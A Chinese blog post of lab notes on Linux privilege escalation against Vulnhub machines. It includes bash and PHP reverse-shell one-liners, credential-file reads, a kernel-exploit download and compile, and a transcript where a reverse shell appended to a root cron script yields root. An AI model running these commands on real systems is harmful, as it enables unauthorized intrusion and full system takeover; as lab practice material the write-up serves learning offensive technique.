首页 > 其他分享 >提权

提权

时间:2024-07-04 16:34:48浏览次数:18  
标签:bin sbin etc nologin cat 提权 bash

/bin/bash -i >& /dev/tcp/192.168.37.8/4444 0>&1

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.8/4444 0>&1'"); ?>

sudo nc lvnp 4444

whoami

sudo -l

uname -a

dpkg -l (是否有python环境)

python -c "import pty;pty.spawn('/bin/bash')"(存在python环境使用这个命令处理命令行)

cat /etc/passwd

cat /etc/shadow

cat /etc/cron.d

cat /etc/crontab

ls -liah

searchsploit Linux ubuntu 4.10.0-28

searchsploit Linux ubuntu -m 45010.c

gcc 45010.c -o 45010

(使用内核提权的方式是比较暴力的容易导致服务器运行服务的中断)

sudo php -S 0:80(创建本机服务器传文件到目标机器)

www-data@ubuntu:/tmp$ wget http://192.168.37.8/45010.c

chmod +x 45010.c

                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/Vulnhub/w1r3s]
└─$ sudo nc -lvnp 4444                                                     
[sudo] password for kali: 
listening on [any] 4444 ...
connect to [192.168.37.8] from (UNKNOWN) [192.168.37.13] 36550
bash: no job control in this shell
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ip a
ip a
bash-4.2$ ifconfig
ifconfig
bash-4.2$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ mysql
mysql
ERROR 1045 (28000): Access denied for user 'jenkins'@'localhost' (using password: NO)
bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory

(crontab是一个自动执行的任务)

bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt

(使用root反弹连接)

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.37.8/4443 0>&1">>/etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.37.13/4443 0>&1">>/etc/script/CleaningScript.sh  




┌──(kali㉿kali)-[~/Desktop/Vulnhub/jacbas]
└─$ sudo nc -lvnp 4443                                                           
[sudo] password for kali: 
listening on [any] 4443 ...
connect to [192.168.37.8] from (UNKNOWN) [192.168.37.13] 40238
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:0e:d5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.37.13/24 brd 192.168.37.255 scope global dynamic ens33
       valid_lft 600617sec preferred_lft 600617sec
    inet6 fe80::9114:a460:aa3:9dd5/64 scope link 
       valid_lft forever preferred_lft forever
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 
[root@jarbas ~]# 



searchsploit Linux ubuntu 4.10.0-28         
--------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                                     | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                                            | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                                                                   | linux/local/41760.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: NoResults

使用 find查找有用文件

查询根目录,把报错文件加入/dev/null中,排序,直接显示结果

查看使用有备份文件

find / -name '*backup*' 2>/dev/null | sort |less

标签:bin,sbin,etc,nologin,cat,提权,bash
From: https://www.cnblogs.com/crabin/p/18284104

相关文章

  • Mysql渗透及提权,命令执行
    查询用户selectuser()查询数据库版本selectversion()查询当前操作系统select@@version_compile_os查询读取数据库路径select@@datadir查询MYSQL安装路径select@@basedir查询plugin的路径select@@plugin_dirMysql-UDF提权https://blog.csdn.net/qq_48201589/......
  • Linux 提权-MySQL UDF
    本文通过Google翻译MySQLUserDefinedFunctions–LinuxPrivilegeEscalation这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。导航0前言1什么是用户定义函数(UDF)?2枚举UDF漏洞利用条件2.1手动枚举UDF漏洞利用条件......
  • Windows CSC提权漏洞复现(CVE-2024-26229)
    漏洞信息WindowsCSC服务特权提升漏洞。当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从......
  • Linux 提权-Capabilities
    本文通过Google翻译Capabilities–LinuxPrivilegeEscalation-Juggernaut-Sec这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。导航0前言1什么是Capabilities?2枚举Capabilities2.1枚举Capabilities-手动方法2.1.......
  • 小白Linux提权
     1.脏牛提权原因:内存子系统处理写入复制时,发生内存条件竞争,任务执行顺序异常,可导致应用崩溃,进一步执行其他代码。get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会......
  • 基础篇——VMware与提权初见
    基础篇——VMware&提权初见1.VMware基础(1)下载并安装VMwareWorkstationPro,下载CentOS7_64的iso镜像文件并安装。(不会就在网上搜索相关教程)(2)VMware中的虚拟机有3种连网方式:仅主机(Host-Only)、桥接(Bridged)、网络地址转换(NAT)。仅主机模式不能访问公网,因此没啥大用......
  • Linux 提权-Cron Jobs
    本文通过Google翻译CronJobs–LinuxPrivilegeEscalation-Juggernaut-Sec这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。导航0前言1什么是CronJob?1.1了解Crontabs和Cron目录1.2如何在Crontab文件中读取Cron......
  • 修改软链接实现提权
    在做vulnhubbottleneck靶机过程中,看到一个修改软链接实现提权或越权的小技巧,固记录一下提权成功后,是www-data的权限,运行sudo-l发现系统中存在clear_logs,可以让bytevsbyte免密运行尝试先把权限提升至bytevsbyte再考虑提root查看clear_logs文件属性看到clear_l......
  • Linux 提权-内核利用
    本文通过Google翻译KernelExploits–LinuxPrivilegeEscalation这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。导航0前言1内核简介2寻找内核漏洞2.1发现内核版本2.2手动查找内核漏洞2.2.1通过Google查找内核漏洞......
  • 内网渗透-Windows常用提权方法
    一、前言将介绍常见的提权方法。从为什么该方法能够提权(原理)到使用方法。二、系统内核漏洞提权1.为什么能提权?内核漏洞通常是指内核溢出漏洞,什么溢出呢?缓冲区溢出。那什么是缓冲区溢出呢?当应用程序或者是内核的驱动程序在接受用户输入的数据的时候,它会把这些数据存储在缓冲区......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99